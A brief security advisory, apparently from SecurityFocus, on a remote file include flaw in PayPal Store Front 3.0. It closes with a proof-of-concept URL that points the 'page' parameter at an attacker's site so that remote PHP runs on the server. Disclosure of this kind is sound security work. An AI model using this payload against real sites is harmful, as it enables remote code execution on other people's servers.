7 lines
No EOL
648 B
Text
7 lines
No EOL
648 B
Text
source: http://www.securityfocus.com/bid/8791/info
|
|
|
|
PayPal Store Front is prone to a remote file include vulnerability. It may be possible for a remote attacker to influence the include path for an external page to point to an attacker-specified location. This could be exploited to include a remote PHP script, which will be executed in the context of the web server hosting the vulnerable PayPal Store Front software.
|
|
|
|
PayPal Store Front 3.0 has been reported to be vulnerable to this issue, however it is possible that other versions are affected as well.
|
|
|
|
http://www.example.com/index.php?do=ext&page=http://www.attacker's_site.com/index |